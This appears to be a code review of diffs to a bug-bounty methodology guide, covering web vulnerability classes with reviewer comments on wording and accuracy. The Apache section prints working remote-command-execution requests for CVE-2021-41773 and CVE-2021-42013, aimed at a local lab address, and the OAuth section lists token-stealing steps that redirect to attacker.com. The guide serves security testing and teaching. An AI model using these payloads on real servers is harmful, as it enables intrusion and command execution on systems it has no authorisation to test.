Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
5
5
6
-
## How to find
6
+
## Where to find
7
+
This vulnerability can appear in all features of the application.
8
+
9
+
## How to exploit
7
10
1. Review Functionality
8
11
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
9
12
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
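Review bot: The added "Where to find" text ("This vulnerability can appear in all features of the application.") is too generic to guide a tester; the retained "How to exploit" context in this same hunk already names review and rating functionality, so point the reader at features that enforce a workflow state (purchase before review, bounded rating scale) instead of "all features". Minor wording in the retained rating bullet: "Some app provides you with an option to provide a rating" reads better as "Some apps let you rate on a scale of 1 to 5", "scale-like provide" should be "scale, e.g. provide", and "-ve" should be spelled out as "negative".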
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
5
+
6
+
## Where to find
7
+
It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308).
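Review bot: The added sentence "you can see the response is (301, 302, 303, 307, 308)" is ungrammatical and hides the reason for the check; suggest "look for parameters whose value is reflected into a response header, most often redirects (status 301, 302, 303, 307 or 308) where the parameter value ends up in the Location header", which ties the location to the mechanism stated in the file's first line (user input reaching the response via an HTTP parameter or URL). "always check the request and response" should also say what to check for: injected CR/LF characters surviving into a header.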
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
5
5
6
+
## How to find
7
+
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
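Review bot: The added "How to find" paragraph treats a missing CSRF token as "likely to be vulnerable", which over-claims: a form can be protected by other controls (SameSite cookie attribute, Origin/Referer validation, a required custom header on JSON endpoints), so phrase it as "worth testing" and list those checks before concluding. Grammar: "Try submit the form" should be "Try submitting the form", and "try check this [List]" should be "check this list". The file's first line "in which they're currently authenticated" is missing its closing period.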
A type of XSS that has payloads found in the DOM rather than within the HTML code.
14
14
15
-
## **How to exploit**
15
+
## Where to find
16
+
This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code.
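Review bot: The renamed "Where to find" section reuses the generic "This vulnerability can appear in all features of the application" sentence; for DOM-based XSS the useful pointer is the client-side code, which the second sentence already says, so lead with that and state what to read for: places where an attacker-controlled source (URL fragment, query string, message data) flows into a sink that writes HTML or executes code. Spelling: "Dom-based" should be "DOM-based" and "javascript" should be "JavaScript". Renaming the old "## **How to exploit**" heading also drops its bold markup, which the other files do not use; good.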
Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
5
-
## How to FInd
5
+
6
+
## Where to find
7
+
This vulnerability can appear in all features of the application. Depending on how to exploit it, for example in the file upload feature, you can upload very large files
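Review bot: The added "Where to find" sentence "Depending on how to exploit it, for example in the file upload feature, you can upload very large files" is an exploit step, not a location, and the leading clause is ungrammatical; split it so the location reads "any feature whose resource usage scales with user input, for example file upload" and keep the large-file example under a "How to exploit" section like the other files. The file's first line "and prevents other users from accessing it" is missing its closing period.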
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
5
5
6
+
## Where to find
7
+
In the feature where the website can send email to us. For example forgot password / newsletter.
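Review bot: "In the feature where the website can send email to us" is vague and grammatically off; suggest "In any feature where the server builds an absolute URL from the Host header and sends it to the user, for example forgot-password or newsletter emails", which connects the location to the mechanism the file's first line describes (the server implicitly trusting the Host header). "forgot password / newsletter" should also be written as a proper list: "password reset, newsletter".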
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
5
5
6
-
## How to FInd
6
+
## Where to find
7
+
- Usually it can be found in APIs.
8
+
- Check the HTTP request that contain unique ID, for example `user_id` or `id`
9
+
10
+
## How to exploit
7
11
1. Add parameters onto the endpoints for example, if there was
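Review bot: The added bullet "Check the HTTP request that contain unique ID" has a number-agreement error; suggest "Check HTTP requests that contain an object identifier, for example `user_id` or `id`". The retained "How to exploit" step "1. Add parameters onto the endpoints for example, if there was" ends mid-sentence as shown; make sure the file carries the complete example. The file's first line "IDOR stands for Insecure Direct Object Reference is a security vulnerability" is a run-on; "IDOR (Insecure Direct Object Reference) is a security vulnerability in which..." reads correctly.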
The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account.
5
5
6
-
## How to find
6
+
## Where to find
7
+
In the SSO feature. For example `Log in with google` or `Log in with facebook`.
8
+
9
+
## How to exploit
7
10
1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses).
8
11
2. Change Referral header to attacker.com while requesting OAuth.
9
12
3. Create an account with [email protected] with normal functionality. Create account with [email protected] using OAuth functionality. Now try to login using previous credentials.
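Review bot: The added "Where to find" text should capitalise the product names ("Log in with Google", "Log in with Facebook"); they are button labels, not code, so the backticks are also unnecessary. In the retained exploit list, "Change Referral header" refers to the HTTP `Referer` header and should use that name. Step 3 shows "[email protected]" for both registrations, which does not make clear that the point is registering the same address once normally and once via OAuth; spell that out so the account-linking issue is readable.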
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain
5
5
6
-
## How to Find
6
+
## Where to find
7
+
- Sometimes it can be found in login / register / logout pages
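Review bot: The added bullet "Sometimes it can be found in login / register / logout pages" should say what to look for on those pages: the parameter that carries the post-action destination, which the file's first line describes as user-controllable data placed into the redirect target. The file's first line "causes a redirection to an arbitrary external domain" is missing its closing period.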
What would you do if you came across a website that uses Apache (HTTP Server)?
5
+
6
+
## How to Detect
7
+
Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page
8
+
9
+
1. Find the related CVE by checking Apache (HTTP Server) version
10
+
* How to find the Apache (HTTP Server) version
11
+
12
+
By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html)
13
+
14
+
Some example CVE:
15
+
16
+
- CVE-2021-41773 (RCE and LFI)
17
+
```
18
+
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
19
+
Host: 127.0.0.1:8080
20
+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
21
+
Accept: */*
22
+
Content-Length: 7
23
+
Content-Type: application/x-www-form-urlencoded
24
+
Connection: close
25
+
26
+
echo;id
27
+
```
28
+
- CVE-2021-42013 (RCE and LFI)
29
+
```
30
+
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
31
+
Host: 127.0.0.1:8080
32
+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
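Review bot: The new file's "How to Detect" heading does not match the "Where to find" / "How to find" headings this same commit introduces in the other files; rename it for consistency, and the numbered "1. Find the related CVE by checking Apache (HTTP Server) version" list appears without the "## How to exploit" heading the other files use. The detection guidance relies only on the `Server:` banner and the 404 page, which is unreliable for deciding CVE applicability: the version can be suppressed via the ServerTokens directive, and distribution packages backport fixes without changing the banner, so state that the banner only suggests a candidate version and that applicability must be confirmed separately. "If you found outdated Apache" should read "If you find an outdated Apache". The example requests for CVE-2021-41773 and CVE-2021-42013 are shown against `127.0.0.1:8080`; keep it that way and say in the text that this is a local lab target.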